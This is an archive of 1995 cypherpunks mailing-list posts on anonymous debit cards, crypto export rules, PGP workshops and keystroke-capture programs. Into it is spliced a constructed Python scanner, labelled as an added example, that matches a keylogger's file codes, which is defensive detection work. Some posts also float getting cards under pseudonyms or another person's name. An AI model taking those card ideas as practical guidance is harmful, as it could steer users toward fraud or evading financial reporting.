Please don't be bashful about doing a demo! The idea is to educate and
expose people to tools and software they might otherwise only vaguely
know about. Demos don't have to be polished and professional.

And please send me a brief note if you want to demo something.

--Tim May

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 2 Jan 95 13:20:50 PST
To: cypherpunks@toad.com
Subject: Re: Anonymous payment scheme
Message-ID: <199501022121.NAA07411@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

There are a couple of issues here.  One is whether you could get a
debit card with another name printed on it than your own.  Sandy
Sandfort and some others have suggested here that this would be legal
and possible already as long as you don't do it with the intention to
commit fraud.  You can open a secured account by mail and give a false
name.

I'm not sure what you do in this situation if they ask to see some ID
when you try to use the card.  This would be rather embarrassing, it
seems to me.  Sorry, I guess I left my driver's license in my other
pants... Or, never mind, try this card.  That other one was from before I
changed my name...

The other issue is whether you could set up a payment system which did
not require social security numbers from the participants.  I think
this is much more questionable.  Although the phone cards and some
other restricted usage systems are apparently legal, bank accounts seem
to have many more restrictions.  Barter and scrip systems are also
heavily regulated.  All these laws involving reporting requirements,
etc., were passed to help the government track the flow of money.
There is no way the government is going to make an exception at this
point.  In fact, I suspect that if the limited systems expanded to
where they were used for general payments, the government would crack
down.  I recall reading that just such a crackdown occurred in Las Vegas
when casino chips started to be accepted for non-gambling payments.

So, you may be able to have a form of anonymity from the person you are
transacting with, but I don't think you can be anonymous from the bank
and from the government.  And personally, I am more concerned about the
bank and gov't tracking my spending patterns than whether the guy I buy
gas from knows my name.  The bank has a lot more information about me
which is much more threatening to my privacy.  A nom de guerre VISA or
debit card does not seem to help this problem.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLwhuNRnMLJtOy9MBAQEkPQIAqEEglLxt8E4Rrgh7dR93fuCSJUI+UMgF
3XUrsTxM4whOejFMrluOAYM+2RdBOgYTk1mNEiAgSUPLLScIa9zU5A==
=CF5G
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@scruznet.com>
Date: Mon, 2 Jan 95 13:43:20 PST
To: "Timothy C. May" <cypherpunks@toad.com
Subject: RE: Reminder: January 14th "Tools Demo Day" Meeting
Message-ID: <Chameleon.4.01.950102134344.jcorgan@jcorgan.sj.scruznet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Some may recall an idea I wrote about a couple weeks ago to provide
transparent encryption/signing/remailing facilities to users of Windows 
Sockets based mail agents on PC's (e.g., Eudora).

I have completed an initial portion of the program as a "proof of
concept."  All it does right now is act as an SMTP server, accept
mail from a mail agent, perform requested encryption/signing operations
on received messages, and put RFC 822 compliant outbound messages in a
directory for submission to a 'real' SMTP server. (No remailing features
present).

Of course, the next module to write is the SMTP client that takes this
outbound message queue and sends it off to the actual SMTP server.

It is a bare bones app with no user interface, fault tolerance, or
configuration options, and probably only works on my machine at the
moment :)

I don't expect to make any significant progress on the program between
now and the Jan. 14 meeting, but if anyone is interested I will bring it
to the meeting and "demo" what little there is at the moment.

==
Johnathan Corgan         "Violence is the last refuge of the incompetent."
jcorgan@scruznet.com                      -Isaac Asimov
WWW:                 ftp://ftp.netcom.com/pub/jc/jcorgan/www/homepage.html








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 2 Jan 95 10:26:08 PST
To: cypherpunks@toad.com
Subject: (Fwd) Re Anonymous posting
Message-ID: <199501021826.NAA11086@pipe2.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


For those interested in the anonymity issue there is a lively 
debate on list Cyberia-L (a legal list) which was stimulated, 
in part, by Peter Lewis's articles on anonymity and the 
LaMacchia case dismissal.

For participation send message to:

     listserv@listserv.cc.wm.edu

     subscribe cyberia-l Your name

Provocatively, I forward the following:


Forwarding mail by: jsilverm@reach.com (Jared Silverman -- NJ 
Bureau of Sec. - Newark) on Mon, 2 Jan 11:58 AM
-------------------

On January 1, 1995, Buford Terrell wrote:

>Anonymity is very much a core 1st Amendment value and at the
>center of both political speech and the right to assemble.
[Snip]
>Often times, the only way weak or unpopular minorities can speak
>is anonymously.  There have been many times when to couple one's
>name to one's writings would be to invite martyrdom.  I had
>rather risk a few perverts than to stifle this most important
>channel for dissent.


It is one thing to claim First Amendment protection to shield
political speech, IMHO it is another to shield fraud and criminal
behavior.

Besides the First Amendment runs against the government, not in
favor of individuals in actions brought by private parties.  In
the sexism thread, would anyone claim that an individual has the
right to harass or stalk a person under the guise of the First
Amendment?  Would the First Amendment be a defense in a defamation
suit?  Of course not (Times v. Sullivan aside).  Doesn't an
individual have the right to know the identity of someone who is
trying to communicate with him/her on a private basis?  To a
certain extent, the question was crystallized in the caller ID
debate -- Who has the superior right, the calling party to
anonymity or the called party to knowing who is calling?

One of the areas of my professional concern is the use of
cyberspace for securities fraud and manipulation.  Cyberspace is
an ideal medium for these activities because of the availability
of anonymity and pseudonymity.  Even on commercial BBSs, where
"member lists" are available, posting to these lists is voluntary
and those who draw my attention are rarely on these lists.  Does
all of cyberspace become off limits to conventional private rights
and law enforcement under the rubric of "freedom of speech and
assembly?"



|--------------------------------------------------------------|
|A. Jared Silverman, Chief-New Jersey Bureau of Securities     |
|jsilverm@reach.com | 201-504-3600 (phone) | 201-504-3601 (fax)|
|**************************************************************|
|    My purpose holds to sail beyond the sunset - Tennyson     |
|**************************************************************|
|The foregoing is the personal opinion of the sender and is not|
|the official position of either the Bureau of Securities or   |
|the New Jersey Attorney General and the Department of Law and |
|Public Safety.  Affiliation given for identification only.    |
|--------------------------------------------------------------|









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Mon, 2 Jan 95 14:53:46 PST
To: carolann@icicle.winternet.com
Subject: Re: Exporting cryptographic materials, theory vs. practice
In-Reply-To: <Pine.SUN.3.91.950102013630.23484A-100000@icicle.winternet.com>
Message-ID: <fQ72lyczBiz4075yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.SUN.3.91.950102013630.23484A-100000@icicle.winternet.com>, you wrote:

> Right now, I don't think U.S. Customs is going to ask you if you
> have PGP in your PC if you leave the country, or return either.
> 
> They should, and I'd be proud to say yes.

And you can beam with pride as they impound your PC and take it away.
Gosh.  Sometimes it's just swell to be a cypherpunk.  Kinda chokes me 
up. . . .

Right now the situation is a sort of security-through-obscurity
situation where they're not going to bother you for having PGP on your
laptop's hard disk.  Security through obscurity sucks, but the present
situation is still better than the one where they know what to look for
and what questions to ask, and you're headed for the slammer if you
haven't gotten your temporary export license signed and stamped and
ready to go.

Do you want it to be easier to comply with bad law?

                          | PROOF-READER, n: A malefactor who atones for
   Alan Bostick           | making your writing nonsense by permitting
   abostick@netcom.com    | the compositor to make it unintelligible.
finger for PGP public key |      Ambrose Bierce, THE DEVIL'S DICTIONARY
Key fingerprint:          | 
50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 79  +legal_kludge=off

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQB1AgUBLwh5U+VevBgtmhnpAQGWywMAhEpmFRrQXJPRpF4mPqAHmaxcGpZm00z2
acEogITT4O+aT+qGOoAiUnlaRWXOLmkOle75dhoAiJOabzRJ09rwXfyZzVLna8Gd
DI9fVCrIjodY3Xl6BLZfRjblmDIQT6LA
=RzSg
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Mon, 2 Jan 95 12:38:34 PST
To: werewolf@io.org
Subject: Re: Anonymous payment scheme
Message-ID: <9501022030.AA03421@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:52 AM 1/2/95 -0600, Samuel Kaplin wrote:
>... I was looking at the bigger picture. Any merchant who accepts Visa or MC
>could now accept anonymous payments. No hassle at all on their part. They
>probably wouldn't even know that it was an anonymous account. It fits into
>the existing infrastructure very nicely.

If you can convince BankAmerica or MasterCard International to deal with you.

> ... Walk into the issuing authority, plunk your $9999.99 on the counter and
> ask for your card. When you've spent it all, toss the card.

Right there you imply one of the requirements you'd need to fulfill--the 
reporting requirements on cash transactions over $10K.  If you accepted many 
deposits over $5K, you probably get asked a lot of questions about how 
you're preventing people from structuring transactions to avoid the 
reporting requirement.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: crawford@scruznet.com (Michael D. Crawford)
Date: Mon, 2 Jan 95 15:37:03 PST
To: KEY-CAPTURE@lsd.com
Subject: Comments on Key Capture Survey
Message-ID: <199501022337.PAA05279@scruz.net>
MIME-Version: 1.0
Content-Type: text/plain


I am the author of the Last Resort keystroke capture program for the
Macintosh, published by Working Software, Inc.  I am writing up the
surveys for LR for Mac, DOS and Windows and will send them shortly.  I have
a couple of comments, which the list might be interested in hearing.

Your entries for the Macintosh should record the file type and creator
code, which are, for Last Resort, 'cdev' and 'mIKE' respectively (case is
significant).  If someone were to write an automated scanner meant to
protect a disk against such utilities, it would be much more reliable if it
looked for the creator codes, as Mac programs are usually written to not
depend on having a particular file name.  These codes live in the file
system, but are not part of the name space as '.EXE' would be on DOS.  You
can view them with ResEdit's "Get File/Folder Info" item from the File
menu.

We spent a lot of time pondering the problem of password theft.  We decided
that the benefit to the consumer of having this utility available to save
data outweighed the obvious danger of password and text theft.  The problem
increases, though, if one is not aware that Last Resort is installed.  The
Read Me file on the distribution disks has a discussion of this problem (as
well as the problem of people snarfing your files when you share your disk
to the whole company or campus), and there is a way to disable key capture
temporarily, for password entry.

I'm not real happy with the ease one can sneak Last Resort onto someone's
machine, but I take a little ironic solace in knowing that similar programs
that are "more hidden" than LR are available in source code form from
Phrack, at least for DOS.

On the plus side, I have gotten many, many letters, e-mails and phone calls
from people who say it saved their butts when a piece of critical
information would have been lost.  I had the habit of taking customer
orders over the phone while in the middle of debugging a program (like Last
Resort!) and would frequently crash before the order could be saved or
printed.  LR saved my company real money in this case.

David Pogue's book _Hard Drive_ is based in part on Last Resort, in that a
key capture utility is used to recover a password that saves the world.  I
was quite tickled by this.

I'm sad to say, though, that I know of one case in which Last Resort
precipitated the end of a relationship, in which a fellow discovered the
love letters his girlfriend had e-mailed to someone else in his Last Resort
files.  This particular fellow was glad that he found out about it, but I
still feel a twinge of guilt when I think about it.

I certainly support any effort made to document the existence of these
programs.  I might suggest that one way to defend against them would be to
watch for the patching of certain system calls - patching GetNextEvent or
installing a jGNEFilter on the Mac, and warning the user if this happens.
It's easy to detect such patching; for the most part it will be innocent,
but a hacker who had a fair amount of Mac programming knowledge could make
a keystroke capture program in an evening of work, so attempting to catalog
them all will provide only moderate protection against them.

BTW... most of those other commercial keystroke capture programs (no names
here) are clones of Last Resort.  Some of them even had the gall to use our
logo in their advertising (in a claim they were better than us).  LR might
not do as much as some of them, but I know that it is more reliable than
the competitors I have tested.  So if you are going to actually _use_ a key
capture program for your own (legitimate!) use, consider getting The Real
Thing, the One True Key Capture Program, the Saviour of Data: Last Resort.

I don't work for WSI any more, but we remain friends, and they can be
reached at:

Working Software, Inc.
PO Box 1844
Santa Cruz, CA 95061-1844
(408) 423-5696
(800) 229-9675
(408) 423-5699 FAX
working@scruznet.com
76004.2072@compuserve.com

Cheers,

Michael D. Crawford
crawford@scruznet.com     <- Please note change of address.
crawford@maxwell.ucsc.edu <- Finger me here for PGP Public Key.
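
The creator-code check suggested in the message above, as an added example that is not part of the original post and is not Working Software's code. It assumes the files under inspection are MacBinary-encoded copies (where the type and creator codes travel in the 128-byte header); `WATCHLIST`, the function names and the sample headers are constructed for illustration, and only the 'cdev'/'mIKE' pair comes from the message.

```python
"""Flag MacBinary-encoded files whose type/creator codes are on a watchlist."""
import struct

HEADER_LEN = 128          # a MacBinary header is one 128-byte block
MAX_FORK = 0x7FFFFF       # fork lengths above this are not valid MacBinary

# (file type, creator) -> description. Codes are compared as raw bytes, so
# case is significant. Only this one pair is taken from the message above.
WATCHLIST = {
    (b"cdev", b"mIKE"): "Last Resort (Working Software, Inc.)",
}


def parse_macbinary_header(header: bytes):
    """Return (name, type, creator, data_len, rsrc_len), or None when the
    block does not look like a MacBinary header."""
    if len(header) < HEADER_LEN:
        return None
    # Bytes 0, 74 and 82 are always zero in a MacBinary header.
    if header[0] != 0 or header[74] != 0 or header[82] != 0:
        return None
    name_len = header[1]
    if not 1 <= name_len <= 63:
        return None
    data_len, rsrc_len = struct.unpack(">II", header[83:91])
    if data_len > MAX_FORK or rsrc_len > MAX_FORK:
        return None
    name = header[2:2 + name_len].decode("mac_roman")
    return name, header[65:69], header[69:73], data_len, rsrc_len


def check(label: str, blob: bytes):
    """Return a finding dict if blob carries a watched type/creator pair."""
    parsed = parse_macbinary_header(blob[:HEADER_LEN])
    if parsed is None:
        return None
    name, ftype, creator, _data_len, _rsrc_len = parsed
    product = WATCHLIST.get((ftype, creator))
    if product is None:
        return None
    return {
        "source": label,
        "mac_name": name,
        "type": ftype.decode("mac_roman"),
        "creator": creator.decode("mac_roman"),
        "match": product,
    }


def scan(blobs):
    """Check every (label, bytes) pair and return the findings in order."""
    findings = []
    for label, blob in blobs:
        hit = check(label, blob)
        if hit is not None:
            findings.append(hit)
    return findings


def build_header(name: str, ftype: bytes, creator: bytes,
                 data_len: int = 0, rsrc_len: int = 0) -> bytes:
    """Build a constructed MacBinary header for the samples below."""
    raw = name.encode("mac_roman")
    if not (1 <= len(raw) <= 63 and len(ftype) == 4 and len(creator) == 4):
        raise ValueError("bad name or code length")
    hdr = bytearray(HEADER_LEN)
    hdr[1] = len(raw)
    hdr[2:2 + len(raw)] = raw
    hdr[65:69] = ftype
    hdr[69:73] = creator
    hdr[83:91] = struct.pack(">II", data_len, rsrc_len)
    return bytes(hdr)


# Constructed sample inputs (not real files).
SAMPLES = [
    ("lastresort.bin", build_header("Last Resort", b"cdev", b"mIKE", 0, 40000)),
    # Renamed copy: the file name no longer helps, the codes still match.
    ("renamed.bin", build_header("Harmless Notes", b"cdev", b"mIKE", 0, 40000)),
    # Same name, but the creator differs in case, so it is a different code.
    ("lookalike.bin", build_header("Last Resort", b"cdev", b"MIKE")),
    ("readme.bin", build_header("ReadMe", b"TEXT", b"ttxt", 1200, 0)),
    ("notes.txt", b"plain text, not a MacBinary header " * 8),
]

if __name__ == "__main__":
    for finding in scan(SAMPLES):
        print(finding)
```

A match on the codes says which product a file claims to be, nothing more; as the message notes, a cataloguing approach gives only moderate protection against a purpose-written capture tool.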






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Mon, 2 Jan 95 13:00:10 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: Regarding anonymous debit cards..
In-Reply-To: <Pine.NXT.3.91.950102120713.12977A-100000@kisa>
Message-ID: <Pine.SV4.3.91.950102153905.24408A-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


>   A lot of the banks in the US are now offering these cards for use with 
> checking accounts.

   Yes.  There are also the ``secured'' credit cards where one deposits X 
dollars into the issuing bank and is allowed 1.5 * X in credit.  Many of 
these will promote to ``real'' credit cards after a year or some specific 
amount of charging that's been paid back on time (usually about $1000).  
These are a godsend for those who've gone bankrupt; as such I wouldn't be 
terribly surprised if the issuers didn't even bother to do a credit check 
until the card promotes, if at all.  If this is the case, what's to stop 
someone from filling out the application under a pseudonymous identity 
with a mail drop as the contact address?    

>   I think they should. If they would is another matter. It would be 
> similar to having a 'secret' Swiss bank account that can be accessed from 
> anywhere in the world, converted to cash at cash machines, transferred to 
> others, etc.

   It's a great idea - at last year's Siggraph convention I needed to 
stay in contact with an associate 24 hours a day if need be.  I 
discovered that in the Kinko's in the Orange County Convention Center 
there's a cellular phone rental machine, but it took credit cards and the 
people at the desk wouldn't let me rent one without one - even though 
I offered to leave my ID and a sizable deposit.  

   I'm technically not old enough to get a credit card, and regardless of 
that fact when I spoke to someone at Barnett Bank about getting one and 
listed my occupation as 'Consultant' she laughed in my face.

   Solution: I got a secured card from a bank in Vermont.  They have $500 
of my money in an account, and I have a card with a $500 limit in my 
father's name.  

>   If there was an Anonymous Visa debit card I'd definitely go for it. It 
> would certainly keep those marketing types from tracking my spending 
> patterns.

   Without a doubt.  I wonder, again, if the issuing bank even _cares_ 
who you are if you get one of these secured cards.  There was discussion 
here about debit/secured cards some time ago - anyone remember the upshot 
of the discussion?

-jon
( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dave.hodgins@canrem.com (Dave Hodgins)
Date: Mon, 2 Jan 95 13:58:58 PST
To: cypherpunks@toad.com
Subject: key servers list
Message-ID: <60.18197.6525.0C1C6B79@canrem.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

 
  Does anyone have an up-to-date list of pgp keyservers available?

  Is there a fingerable keyserver, like wasabi@io.com used to be?

  Thanks in advance, Dave Hodgins.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLwh0YJbACHtihSGlAQGxAwQAmCTfolPaXfyRIKWl+u8fzSrlLxv25GjB
k/+50n11ErwRbJHRPsSAS8okZ9xq8CiVuCUiiOdFe3R7K3idCLVSVQeYWpBcy7ZO
F1vUqcUrsqiar3IxUDAW0UAK5eIf/B5CIsN9TgYMxj7gd0r1UkSXjfgXq+PR9Iqf
tMyBOICzwpU=
=4FTc
-----END PGP SIGNATURE-----
**EZ-PGP v1.07

---
 * RM 1.3 00820 * Internet:Dave.Hodgins@Canrem.com Rime->118 Fido(1:229/15)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Mon, 2 Jan 95 18:39:55 PST
To: Carol Anne Braddock <carolann@icicle.winternet.com>
Subject: Re: Exporting cryptographic materials, theory vs. practice
In-Reply-To: <Pine.SUN.3.91.950102013630.23484A-100000@icicle.winternet.com>
Message-ID: <Pine.3.89.9501021852.A19801-0100000@netcom8>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 2 Jan 1995, Carol Anne Braddock wrote:
> Right now, I don't think U.S. Customs is going to ask you if you
> have PGP in your PC if you leave the country, or return either.
> 
> They should, and I'd be proud to say yes.

Well Carol, I am sure your heart is in the right place, but I
do not agree.

They should not, and I'd be deranged to say yes.

 ---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are.  True law derives from this right, not from
the arbitrary power of the omnipotent state.            jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Mon, 2 Jan 95 18:57:12 PST
To: nobody@rahul.net
Subject: Re: Exporting cryptographic materials, theory vs. practice
In-Reply-To: <199501021725.AA09061@bolero.rahul.net>
Message-ID: <Pine.3.89.9501021805.A19801-0100000@netcom8>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 2 Jan 1995 nobody@rahul.net wrote:
> Doesn't Matt's experience really show simply that not enough people try
> to follow the rules, [...] 
>
> [...]
> 
> I could see a system where you routinely fill out and have your card
> stamped when you check your luggage to show that you are carrying crypto.
> Then you turn it in when you come back.  [...]  How does this
> advance the CP cause?

Exactly so.  Surely we are better off with a system that does not
work.

Furthermore, with the current system, entropy works in our favor.

 ---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are.  True law derives from this right, not from
the arbitrary power of the omnipotent state.            jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Syed Yusuf <yusuf921@uidaho.edu>
Date: Mon, 2 Jan 95 21:36:57 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: Appolgy to P. Zimmerman
Message-ID: <Pine.HPP.3.91.950102211315.15028A-100000@goshawk.csrv.uidaho.edu>
MIME-Version: 1.0
Content-Type: text/plain


Mr. Zimmermann,
I would like to take this opportunity to publicly apologize to
Mr. Zimmermann (the primary author of PGP).
  In a post to the internet I criticized Mr. Zimmermann for taking a short
route to legalize PGP short term rather than directly attack Public Key
Partners' so-called patent of public encryption. 
  I would like to apologize. As I have now been presented with the opportunity
for a business venture requiring encryption of data, I realize that we 
don't all have the legal resources to be mavericks and challenge 
patents. Some of us need encryption now and it's only a matter of time before
PKP's patents fall.

--Syed Yusuf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jRT <jrt@asiaonline.net>
Date: Mon, 2 Jan 95 08:58:31 PST
To: Samuel Kaplin <skaplin@skypoint.com>
Subject: Re: Anonymous payment scheme
In-Reply-To: <qbx1lKjqRC$2075yn@skypoint.com>
Message-ID: <Pine.3.89.9501030049.A16477-0100000@asiaonline.net>
MIME-Version: 1.0
Content-Type: text/plain



Well, I know some shops have so called 'switch' or 'smart' cards to debit 
your account, some of these are on their own credit line, others are not.

I have an account with a bank in Britain which gives me a "VISA" Card 
which is actually a 'direct-debit' card.  I can use it (and have) all 
around the world as a regular VISA card and in any 'VISA compatible' ATM.

As soon as my balance drops to zero, I can no longer use it.  And when I 
do, the money jumps out of my account immediately and can no longer be used.

This is a bank-issued card, and also acts as my ATM card to access my 
current account - there is NO charge for this.  I'm not sure exactly how 
that works.

Whether or not VISA would accept a proposal from First National 
Cyberphunks or not remains to be seen...

------------------------------------------------------------------------------
 jrt@AsiaOnline.Net   john@AsiaOnline.Net   PO Box 86141, Govt PO, Kln, HKG.

 Help protect the environment : This message is made from recycled electrons
------------------------------------------------------------------------------

> Let's suppose myself and 10,000 of my closest friends form the First
> National Cypherpunk Bank and Trust. We go through all of the hassles in
> order to be the issuer of a Master Card or Visa. Now instead of having a
> credit line, it is set up as a debit card. The card's limit is how ever
> much you have prepaid the bank in advance. Once you have hit your prepaid
> amount the card no longer gets approved. Now because everything is prepaid,
> there is no risk to me, so I'll put any name you want on the card. The
> questions I have are:





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <rogaski@phobos.lib.iup.edu>
Date: Tue, 3 Jan 95 00:19:29 PST
To: cypherpunks@toad.com (Cypherpunks)
Subject: HACK - EFH Presents Free PGP Encryption Workshop (fwd)
Message-ID: <199501030819.DAA29763@phobos.lib.iup.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Just thought you may be interested in this. 
Anybody ever hear of this EFH group?  It's nice to see somebody making
PGP a little easier for the average jane/joe end-user-type to use.
 
- From the node of FringeWare Daily:
: 
: Sent from: Jon Lebkowsky <jonl>@io.com
: 
: >From: robbiew@inviso.com
: >Summary: January 14, 3:00 PM, SCCSI offices in Houston
: >Keywords: Houston EFH PGP Workshop
: 
: 		     Electronic Frontiers Houston
: 			      presents a
: 		     Free Cryptography Workshop:
: 		    How to use Pretty Good Privacy
: 				(PGP)
: 		      presented by Paul Elliott
: 			 14 January 1995 3PM
: 
: 
: It has become apparent that the data super highway is not safe. Messages
: traveling the data highway can be hijacked by sinister data interlopers.
: 
: After six months of unpaid labor, in June, 1991 Philip Zimmermann
: released his controversial freeware program Pretty Good Privacy (PGP).
: Just as Prometheus' liver was eternally chewed by eagles for the crime
: of bringing fire to mankind, Philip Zimmermann's liver is now being
: chewed by the Federal Eagle (The U.S. Custom Service) for the alleged
: crime of releasing strong cryptography to the world.
: 
: As a result of Philip Zimmermann's contribution, you can use the widely
: available freeware program PGP to send electronic-mail messages to
: anyone in the world, in complete privacy! In addition you can send
: authentication with your messages so that the recipient can verify that
: the message really came from you. You can encrypt sensitive files on
: your computer so that the files remain private even if your computer and
: disks are stolen.
: 
: In this free workshop, our presenter Paul Elliott will show you how you
: can use PGP effectively, easily, and intelligently. PGP is available for
: most popular computers and Operating Systems, including MSDOS, UNIX, MAC
: and OS/2 among many others.
: 
: The Workshop will take place on January 14, at 3:00 PM at the
: offices of South Coast Computing located at 1811 Bering, Suite 100. Park
: in the garage, and ignore the "contract only" sign.  Enter through the
: back door (adjacent to the garage) and use the house phone (dial 100) if
: the door is locked.
: 
: 
:       | Augusta   | Bering    | Chimney Rock   | 610 Loop West       ^
:       |           |           |                |                     |
:       |           |           |                |                     N
:   ----+-----------+-----------+----------------+---- San Felipe
:       |           |* SCCSI    |                |
:       |           |           |                |
:   ----+-----------+-----------+----------------+---- Westheimer
:       |           |           |                |
:       |           |           |                |
:   ----+-----------+-----------+----------------+---- 59 South (SW Fwy)
:       |           |           |                |
:       |           |           |                |
: 
: 
: For more information call (713)799-1044 or
: email efh@blkbox.com
: 
: --
: Robbie Westmoreland			robbiew@inviso.com
: Electronic Frontiers Houston  announcement
: 
: 
: 
: 
: 
: -- 
: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
: Jon Lebkowsky             FringeWare<tm>, Inc.            jonl@fringeware.com
: URL http://fringeware.com/staff/jonl/jonl.html           voxmail 512-444-2693
: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
: 
: 
: 
: 
: 

- -----
Mark Rogaski a.k.a. Doc                 "I used to think that my brain was the
rogaski@phobos.lib.iup.edu               best part of my body ... but then I
http://www.lib.iup.edu/~rogaski/         remembered who was telling me this."
100,000 lemmings can't be wrong!                         - Emo Phillips

>>>>>finger fllevta@oak.grove.iup.edu for PGP Public Key and Geek Code v2.1<<<<<

Disclaimer:  You would probably be hard-pressed to find ANYONE who agrees
             with me, much less my university or employer...

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bmorris@netcom.com (Bob MorrisG)
Date: Tue, 3 Jan 95 07:42:27 PST
To: cypherpunks@toad.com
Subject: Re: Anonymous payment scheme
In-Reply-To: <199501022121.NAA07411@jobe.shell.portal.com>
Message-ID: <199501031542.HAA11629@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


HH> So, you may be able to have a form of anonymity from the person you ar
HH> transacting with, but I don't think you can be anonymous from the bank
HH> and from the government.  And personally, I am more concerned about th

With a debit card you can't be anonymous, because your money resides in
the bank.  With digital cash, and the ability to transfer money to
another digital cash card via phone lines, I don't see how they can
successfully trace everything.  They will try, no doubt.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Lane <blane@seanet.com>
Date: Tue, 3 Jan 95 08:15:04 PST
To: Bob MorrisG <bmorris@netcom.com>
Subject: Re: Anonymous payment scheme
In-Reply-To: <199501031542.HAA11629@netcom11.netcom.com>
Message-ID: <Pine.NXT.3.91.950103080014.28792B-100000@kisa>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 3 Jan 1995, Bob MorrisG wrote:

> HH> So, you may be able to have a form of anonymity from the person you ar
> HH> transacting with, but I don't think you can be anonymous from the bank
> HH> and from the government.  And personally, I am more concerned about th
> 
> With a debit card you can't be anonymous, because your money resides in
> the bank.  With digital cash, and the ability to transfer money to
> another digital cash card via phone lines, I don't see how they can
> successfully trace everything.  They will try, no doubt.

  I don't see why a debit card couldn't be anonymous, even to the point 
of having no name, AND no picture on it. Yes, the bank has the money, but 
their only obligation is to dish it out to the vendors/ATMs that you have 
used your card with. Why should a bank care who you are once they have 
your money in the account?

  As to avoiding fraud with the card, is it really that huge of a 
problem? As long as no one copies the number (could go so far as no 
embossed number. Just a gloss black card with a hologram of a Bald Eagle 
on the front of it), and you don't lose the card, how can someone use your 
account?

  I think that this anonymous debit card would be a good first step 
towards anonymous digital cash. You still couldn't exchange digital cash 
with your buddy in Taiwan, but it would work for converting to physical 
cash (which I still like, and is the best anonymous cash around right now).

  Anyone here adept enough at finance to write a proposal for CitiCorp? :>
How would they make their money off the cards? Annual fees, and vendor 
percentages I guess?

    Brian

------------------------------------------------------------------------------
"Everyone is a prisoner holding their own key."    | finger blane@seanet.com 
    -- Journey                                     | PGP 2.6 email accepted
------------------------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 3 Jan 95 05:18:10 PST
To: Hal <cypherpunks@toad.com
Subject: Re: Anonymous payment scheme
Message-ID: <v01510101ab2efaf7b3ee@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:21 PM 1/2/95, Hal wrote:
>I'm not sure what you do in this situation if they ask to see some ID
>when you try to use the card.  This would be rather embarrassing, it
>seems to me.  Sorry, I guess I left my drivers license in my other
>pants... Or, never mind, try this card.  That other one was from before I
>changed my name...

Why not, "It's a pseudonym."?

Looks like an evangelistic opportunity to me. Pseudonyms can't be illegal,
or Mark Twain and Bob Dylan would have written from prison. ;-).

